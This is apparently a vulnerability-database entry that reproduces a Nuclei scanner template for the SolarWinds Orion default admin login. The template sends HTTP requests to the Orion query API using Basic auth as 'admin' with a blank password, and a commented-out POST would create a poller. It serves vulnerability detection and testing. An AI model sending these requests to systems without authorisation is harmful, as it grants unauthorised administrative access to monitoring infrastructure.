漏洞描述
SolarWinds Orion default admin credentials were discovered.
solarwinds-default-admin: SolarWinds Orion Default Login
PoC代码[已公开]
id: solarwinds-default-admin
info:
name: SolarWinds Orion Default Login
author: dwisiswant0
severity: high
description: SolarWinds Orion default admin credentials were discovered.
reference:
- https://github.com/solarwinds/OrionSDK/wiki/REST
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 2
tags: solarwinds,default-login,vuln
# Optional:
# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1
# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
http:
- raw:
- |
GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username)}}
- |
GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username)}}
payloads:
username:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
words:
- "Content-Type: application/json"
part: header
- type: regex
regex:
- "(totalRow|result|swi)s(:\\/\\/)?"
- "(Orion\\.|Poller(ID)?)s?"
condition: and
part: body
- type: status
status:
- 200
# digest: 4b0a00483046022100f092a4194b0a2296458abd76e4abddae3548cc4cce305544a94df9421edaa3f9022100efb221829be45ef717299d3033bf7d751d778608b9d726c1d2274273a589c6e3:922c64590222798bb761d5b6d8e72950